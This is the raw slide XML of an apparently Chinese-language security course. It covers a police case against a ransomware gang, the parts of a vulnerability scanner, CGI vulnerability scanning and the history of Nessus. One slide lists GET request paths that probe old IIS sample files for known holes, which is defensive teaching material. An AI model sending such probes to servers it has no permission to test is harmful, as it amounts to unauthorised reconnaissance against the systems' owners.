            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>浙江杭州公安机关侦破祁某等人非法获取计算机信息系统数据、非法控制计算机信息系统案。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>月以来，以祁某为首的黑客团伙开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>勒索病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>程序，对杭州某医药公司等实施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>渗透入侵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>植入病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>敲诈勒索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等违法犯罪活动，导致受害企业因系统瘫痪无法正常经营，造成严重损失。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>月，浙江杭州公安机关抓获祁某等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>名犯罪嫌疑人。公安部网安局在本案基础上，及时对存在网络安全风险隐患的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>600</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>余家企业进行通报预警，指导开展漏洞修复等工作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2908352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84C2E03E-3AF2-4A1B-82FC-D0111CDCBE9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868363" y="555625"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>扫描器基本模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="73731" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EDB485B-5420-4F24-B91C-F613D1DFC220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="2276475"/>
            <a:ext cx="5961063" cy="3673475"/>
            <a:chOff x="3078" y="5515"/>
            <a:chExt cx="4440" cy="5147"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73732" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6097192A-6487-4B29-86E6-0B2567B6EE23}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4278" y="5515"/>
              <a:ext cx="1680" cy="659"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="楷体_GB2312"/>
                  <a:cs typeface="楷体_GB2312"/>
                </a:rPr>
                <a:t>用户界面</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73733" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0283985D-7E0A-464C-AC18-384CD8798A19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4278" y="8279"/>
              <a:ext cx="1680" cy="659"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="楷体_GB2312"/>
                  <a:cs typeface="楷体_GB2312"/>
                </a:rPr>
                <a:t>扫描引擎</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73734" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{193E9EAF-CE2A-4DCD-9616-9BA767244FE7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3078" y="9753"/>
              <a:ext cx="1080" cy="81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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="楷体_GB2312"/>
                  <a:cs typeface="楷体_GB2312"/>
                </a:rPr>
                <a:t>扫描方法集</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73735" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{870FDC34-917B-4C97-8E0A-2C7A7004688F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4758" y="9753"/>
              <a:ext cx="1080" cy="815"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="楷体_GB2312"/>
                  <a:cs typeface="楷体_GB2312"/>
                </a:rPr>
                <a:t>漏洞数据库</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73736" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49BCC2E-D263-4971-9217-55023FF481E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6438" y="9753"/>
              <a:ext cx="1080" cy="909"/>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Tx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="楷体_GB2312"/>
                  <a:cs typeface="楷体_GB2312"/>
                </a:rPr>
                <a:t>扫描输出报告</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73737" name="Line 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE02A3CD-0CE0-4C88-B430-2B813203C034}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5118" y="7471"/>
              <a:ext cx="0" cy="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38" name="Line 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FFF110F-CCFF-4657-B8B4-454894258B25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5118" y="8938"/>
              <a:ext cx="0" cy="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39" name="Line 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABE2914A-3E02-4B7F-85F8-2041AE9D7461}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3438" y="8938"/>
              <a:ext cx="1080" cy="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40" name="Line 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA7C063B-9B26-416C-9323-755952E4B676}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5598" y="8938"/>
              <a:ext cx="1320" cy="8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3741" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D1F64CC-0FB0-4E6E-8132-D664DC10C149}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4278" y="6819"/>
              <a:ext cx="1680" cy="652"/>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1800" b="1">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="楷体_GB2312"/>
                  <a:cs typeface="楷体_GB2312"/>
                </a:rPr>
                <a:t>扫描策略</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73742" name="Line 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77C63241-0FC0-4446-9BFB-FD53B851251F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5118" y="6167"/>
              <a:ext cx="0" cy="65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9D02F60C-DD83-4D6B-B5C3-E6F5195A3CC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞扫描：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74755" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57FADFF4-7ECC-4E11-9D21-790C22F71B2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞扫描流程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连接目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WEB SERVER</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发送一个特殊的请求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接收目标服务器返回数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>根据返回数据判断目标服务器是否有此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞。</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91526F0E-D157-4CD5-9DDB-281F10FCDE32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞扫描：例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75779" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12B7231F-6880-4275-8DE9-F56378C74855}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827088" y="2017713"/>
            <a:ext cx="8128000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比如识别出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，则向其发出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>"GET /iissamples/exair/howitworks/codebrws.asp",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>"GET /iissamples/sdk/asp/docs/codebrws.asp",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>"GET /iissamples/exair/howitworks/code.asp",           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>"GET /msadc/samples/selector/showcode.asp",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>"GET /scripts/tools/newdsn.exe”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>如果返回“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>200 OK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>” 的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>应答，则表明存在“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t> IIS samples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>漏洞，需要提示用户进行修改。</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8A0DAAA2-DBAD-47C4-9C83-1B02D183E742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77827" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76D431AA-27DC-4F02-876D-646116CE418B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395288" y="1890713"/>
            <a:ext cx="8548687" cy="4967287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>目前全世界最多人使用的系统漏洞扫描与分析软件。超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>75,000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>个机构使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nessus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>作为扫描该机构电脑系统的软件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1998</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>创办人 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Renaud Deraison </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>展开了一项名为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“Nessus”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的计划，其计划目的是希望能为因特网社群提供一个免费、威力强大、更新频繁并简易使用的远端系统安全扫描程序。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="25000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2002</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>年时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, Renaud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>与 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ron Gula, Jack Huffard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>创办了一个名为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
